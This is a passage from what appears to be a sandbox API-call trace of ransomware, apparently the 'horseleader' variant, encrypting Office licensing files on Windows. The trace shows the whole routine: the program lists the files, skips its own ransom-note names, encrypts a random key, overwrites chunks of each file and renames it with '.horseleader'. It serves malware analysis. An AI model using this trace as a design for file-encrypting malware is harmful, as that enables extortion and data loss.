lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.313] GetProcessHeap () returned 0x780000 [0245.314] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.314] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*") returned 85 [0245.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.315] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.315] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\.") returned 85 [0245.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.315] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.315] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.315] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\..") returned 86 [0245.315] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.315] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x24500, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPC.DLL", cAlternateFileName="")) returned 1 [0245.315] lstrcmpiW (lpString1="OSPPC.DLL", lpString2="Windows") returned -1 [0245.315] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 93 [0245.315] StrStrIW (lpFirst="OSPPC.DLL", lpSrch=".horseleader") returned 0x0 [0245.315] lstrcmpW (lpString1="OSPPC.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.315] lstrcmpW (lpString1="OSPPC.DLL", lpString2="_uninstalling_.png") returned 1 [0245.315] lstrlenW (lpString=".testttjffg") returned 11 [0245.315] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", lpSrch=".testttjffg") returned 0x0 [0245.315] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.315] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.316] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.316] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 93 [0245.316] StrStrW (lpFirst="OSPPC.DLL", lpSrch=".txt") returned 0x0 [0245.316] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=148736) returned 1 [0245.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.316] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.318] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.319] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.319] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfa80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.319] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.324] 
WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1f500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.324] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.326] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.326] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.326] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.326] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.326] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.326] CloseHandle (hObject=0x158) returned 1 [0245.327] GetProcessHeap () returned 0x780000 [0245.327] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.327] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.horseleader") returned 105 [0245.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll.horseleader")) returned 1 [0245.328] GetProcessHeap () returned 0x780000 [0245.328] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.328] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59922e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x1be700, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPCEXT.DLL", cAlternateFileName="")) returned 1 [0245.328] lstrcmpiW (lpString1="OSPPCEXT.DLL", lpString2="Windows") returned -1 [0245.328] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned 96 [0245.328] StrStrIW (lpFirst="OSPPCEXT.DLL", lpSrch=".horseleader") returned 0x0 [0245.329] lstrcmpW (lpString1="OSPPCEXT.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.329] lstrcmpW (lpString1="OSPPCEXT.DLL", lpString2="_uninstalling_.png") returned 1 [0245.329] lstrlenW (lpString=".testttjffg") returned 11 [0245.329] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL", lpSrch=".testttjffg") returned 0x0 [0245.329] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.329] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned 96 [0245.331] StrStrW (lpFirst="OSPPCEXT.DLL", lpSrch=".txt") returned 0x0 [0245.331] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1828608) returned 1 [0245.331] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.331] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.333] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.333] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.334] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xdcb80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.334] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.336] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.337] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.337] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1b9700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.337] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.339] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.339] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.340] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.340] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.340] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.340] CloseHandle (hObject=0x158) returned 1 [0245.340] GetProcessHeap () returned 0x780000 [0245.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.340] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.horseleader") returned 108 [0245.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.horseleader")) returned 1 [0245.341] GetProcessHeap () returned 0x780000 [0245.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.341] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="osppobjs-spp-plugin-manifest-signed.xrm-ms", cAlternateFileName="OSPPOB~1.XRM")) returned 1 [0245.342] lstrcmpiW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="Windows") returned -1 [0245.342] wnsprintfW (in: pszDest=0x7e1110, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 126 [0245.342] StrStrIW (lpFirst="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".horseleader") returned 0x0 [0245.342] lstrcmpW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0245.342] lstrcmpW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0245.342] lstrlenW (lpString=".testttjffg") returned 11 [0245.342] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0245.342] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.342] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 126 [0245.343] StrStrW (lpFirst="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".txt") returned 0x0 [0245.343] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11646) returned 1 [0245.343] 
ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2d7e, lpOverlapped=0x0) returned 1 [0245.346] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd282, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.346] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2d7e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2d7e, lpOverlapped=0x0) returned 1 [0245.346] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.347] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.347] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.347] CloseHandle (hObject=0x158) returned 1 [0245.347] GetProcessHeap () returned 0x780000 [0245.347] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.348] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.horseleader") returned 138 [0245.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft 
shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.horseleader")) returned 1 [0245.349] GetProcessHeap () returned 0x780000 [0245.349] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.349] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59948fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x212b00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPOBJS.DLL", cAlternateFileName="")) returned 1 [0245.349] lstrcmpiW (lpString1="OSPPOBJS.DLL", lpString2="Windows") returned -1 [0245.349] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned 96 [0245.349] StrStrIW (lpFirst="OSPPOBJS.DLL", lpSrch=".horseleader") returned 0x0 [0245.349] lstrcmpW (lpString1="OSPPOBJS.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.349] lstrcmpW (lpString1="OSPPOBJS.DLL", lpString2="_uninstalling_.png") returned 1 [0245.350] lstrlenW (lpString=".testttjffg") returned 11 [0245.350] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL", lpSrch=".testttjffg") returned 0x0 [0245.350] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 
[0245.350] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned 96 [0245.351] StrStrW (lpFirst="OSPPOBJS.DLL", lpSrch=".txt") returned 0x0 [0245.351] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2173696) returned 1 [0245.351] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.351] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.354] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.355] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x106d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.355] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.359] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.359] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.359] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x20db00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.360] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.363] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, 